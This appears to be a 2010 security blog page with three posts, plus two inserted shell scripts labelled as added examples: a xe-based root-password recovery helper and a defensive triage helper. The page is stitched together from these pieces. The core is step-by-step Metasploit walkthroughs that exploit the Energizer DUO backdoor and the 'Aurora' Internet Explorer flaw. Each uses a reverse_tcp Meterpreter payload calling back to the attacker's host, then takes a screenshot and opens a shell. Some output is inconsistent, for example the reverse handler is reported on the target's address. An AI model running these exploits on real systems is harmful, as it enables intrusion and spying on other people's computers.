Thursday, 13 May 2010

How To Reset A Forgotten root Password On A Linux Virtual Machine on XenServer

I recently had to carry out some maintenance on a Linux server hosted on our XenServer; however, I had forgotten the root password. Lesson learned: save passwords in a secure location such as an encrypted USB stick or an encrypted file on my cell phone. Anyway, I digress; on to the "make it just work" section.

From XenCenter, select the virtual machine you want to boot in single user mode.

Shut down the virtual machine using the XenCenter controls.

Right-click the virtual machine, select Properties and open the Boot Options page.

Change the OS Boot Parameters to

rw init=/bin/bash

NOTE: If there is already something in the OS Boot Parameters field, write it down, because you will need to put it back once the password reset is complete.

Save and start your virtual machine.

Your system will now boot into single user mode (strictly, a root shell started in place of init, so no services are running and the network is down).

Now it's time to change your password:

machinename# passwd root

Type in your new password; you will then be asked to confirm it.

Your password has now been reset. Shut down your virtual machine:

machinename# shutdown -h now

Now go back to XenCenter, open the Boot Options page again, remove rw init=/bin/bash and change the OS Boot Parameters back to whatever was there before.
Start up your virtual machine and you should be able to log on with your new root password.
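The whole procedure above, written out as an added example that is not part of the original post. It has two halves: helpers that run on the XenServer host and save, change and restore the boot parameters, and a helper that runs inside the recovery shell. It assumes the VM is paravirtualised, so the OS Boot Parameters field in XenCenter is the PV-args parameter of the xe CLI; the xe commands, the backup file and all function names are this example's own, not the post's.

```shell
#!/bin/sh
# Added example, not part of the original post: helpers for the recovery
# procedure described above. Assumptions: the VM is a paravirtualised guest,
# so its "OS Boot Parameters" field is the PV-args parameter exposed by the
# XenServer xe CLI; enter/leave_recovery_mode run on the XenServer host,
# reset_root_password_and_halt runs inside the recovery shell reached with
# "rw init=/bin/bash".

RECOVERY_ARGS="rw init=/bin/bash"

# Remove the recovery tokens from a boot-parameter string, leaving whatever
# the administrator had configured before (the value the NOTE says to keep).
strip_recovery_params() {
    printf '%s\n' "$1" | tr ' ' '\n' \
        | grep -v -x -e 'rw' -e 'init=/bin/bash' \
        | tr '\n' ' ' | sed 's/^ *//; s/ *$//'
}

# Build the temporary value: original parameters plus the recovery tokens,
# without duplicating tokens that are already present.
add_recovery_params() {
    base=$(strip_recovery_params "$1")
    if [ -n "$base" ]; then
        printf '%s %s\n' "$base" "$RECOVERY_ARGS"
    else
        printf '%s\n' "$RECOVERY_ARGS"
    fi
}

# Save the current PV-args to a backup file, then set the recovery value and
# boot. $1 is the VM uuid (from "xe vm-list"), $2 the backup file.
enter_recovery_mode() {
    xe vm-shutdown uuid="$1"
    xe vm-param-get uuid="$1" param-name=PV-args > "$2"
    xe vm-param-set uuid="$1" PV-args="$(add_recovery_params "$(cat "$2")")"
    xe vm-start uuid="$1"
}

# Put the saved PV-args back verbatim and boot normally.
leave_recovery_mode() {
    xe vm-param-set uuid="$1" PV-args="$(cat "$2")"
    xe vm-start uuid="$1"
}

# Return 0 if the "/" entry in a mounts file ($1, default /proc/mounts) is rw;
# the last entry for "/" wins, which matches the kernel's current mount.
root_fs_rw() {
    awk '$2 == "/" { rw = 0; n = split($4, o, ","); for (i = 1; i <= n; i++) if (o[i] == "rw") rw = 1 }
         END { exit rw ? 0 : 1 }' "${1:-/proc/mounts}"
}

# Inside the recovery shell: make sure the root filesystem is writable, set
# the password, flush the change to disk, then halt. With init=/bin/bash there
# is no init process for shutdown(8) to hand off to, so fall back to a forced
# halt if it fails.
reset_root_password_and_halt() {
    root_fs_rw || mount -o remount,rw /
    passwd root
    sync
    shutdown -h now || halt -f
}
```

Typical use on the host is enter_recovery_mode with the VM uuid and a backup file, then reset_root_password_and_halt at the recovery prompt, then leave_recovery_mode with the same uuid and file. The root_fs_rw check matters because a forgotten "rw" leaves passwd unable to write /etc/shadow, and the sync before halting matters because nothing else will flush the write for you in a shell that replaced init.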

Wednesday, 10 March 2010

How To Exploit the Energizer Trojan

As of release 8749, you can use Metasploit to locate infected systems on your local network with the following commands:

# msfconsole
msf > use auxiliary/scanner/backdoor/energizer_duo_detect
msf auxiliary(energizer_duo_detect) > set RHOSTS 10.0.0.0/24
msf auxiliary(energizer_duo_detect) > set THREADS 256
msf auxiliary(energizer_duo_detect) > run

[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"] .......

To take things a step further and gain access to a system running this backdoor, use the energizer_duo_payload module:

msf > use exploit/windows/backdoor/energizer_duo_payload
msf exploit(energizer_duo_payload) > set RHOST 10.0.0.23
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(energizer_duo_payload) > set LHOST 10.0.0.253
msf exploit(energizer_duo_payload) > exploit

[*] Started reverse handler on 10.0.0.23:4444

[*] Trying to upload C:\NTL0ZTL4DhVL.exe...

[*] Trying to execute C:\NTL0ZTL4DhVL.exe...

[*] Sending stage (747008 bytes)

[*] Meterpreter session 1 opened (10.0.0.23:4444 -> 10.0.0.253:1200)

meterpreter > getuid
Server username: HACKME\TestUser
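As an added example that is not from the original post, here is the defender-side follow-up to the scan above: pull the reported addresses out of saved msfconsole output and re-check whether TCP 7777 (the port the scanner reports the backdoor on) still answers, so a remediation list stays current. The sample scan output is constructed in the format shown above, and the helper assumes bash (for its /dev/tcp pseudo-device) and coreutils timeout(1) are installed; the function names are this example's own.

```shell
#!/bin/sh
# Added example, not part of the original post: triage helper for hosts the
# energizer_duo_detect scanner reports. Assumptions: bash is available for the
# /dev/tcp pseudo-device and coreutils timeout(1) bounds each connect attempt.

# Extract the IP address from every "[*] <ip>:<port> FOUND: ..." line, reading
# the files given as arguments or stdin when there are none.
found_hosts() {
    awk '$1 == "[*]" && $3 == "FOUND:" { split($2, a, ":"); print a[1] }' "$@"
}

# Return 0 if a TCP connect to $1:$2 succeeds within PROBE_TIMEOUT seconds.
port_open() {
    timeout "${PROBE_TIMEOUT:-2}" bash -c "exec 3<>/dev/tcp/$1/$2" 2>/dev/null
}

# Read hosts on stdin, one per line, and print a tab-separated status line for
# each. An open port is only an indicator: confirm with the detect module
# before treating a host as infected, since anything could listen on 7777.
triage_hosts() {
    port="${1:-7777}"
    while read -r host; do
        [ -n "$host" ] || continue
        if port_open "$host" "$port"; then
            printf '%s\tTCP %s open - isolate and confirm with energizer_duo_detect\n' "$host" "$port"
        else
            printf '%s\tTCP %s closed - remediated or host offline, recheck later\n' "$host" "$port"
        fi
    done
}

# Constructed sample of scanner output in the format shown above (not a real scan).
SAMPLE_SCAN='[*] 10.0.0.23:7777 FOUND: [["F", "AUTOEXEC.BAT"]]
[*] Scanned 128 of 256 hosts (50% complete)
[*] 10.0.0.42:7777 FOUND: [["F", "AUTOEXEC.BAT"]]
[*] Auxiliary module execution completed'

# Usage: save the msfconsole output to a file, then
#   found_hosts scan.log | triage_hosts
# or, with the constructed sample:
#   printf '%s\n' "$SAMPLE_SCAN" | found_hosts | triage_hosts
```

Re-running the triage after each remediation batch gives a simple open/closed ledger per host; keep the original scanner output as the authoritative record of which hosts were actually confirmed infected.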

Wednesday, 20 January 2010

Reproducing the "Aurora" IE Exploit

To get started, grab the latest copy of the Metasploit Framework and use the online update feature to sync the latest exploits from the development tree. Start the Metasploit Console (msfconsole) and enter the commands shown below:

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit

[*] Exploit running as background job.
[*] Started reverse handler on port 4444
[*] Local IP: http://192.168.0.151:8080/
[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)
[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > screenshot aurora.bmp


meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Developer\Desktop>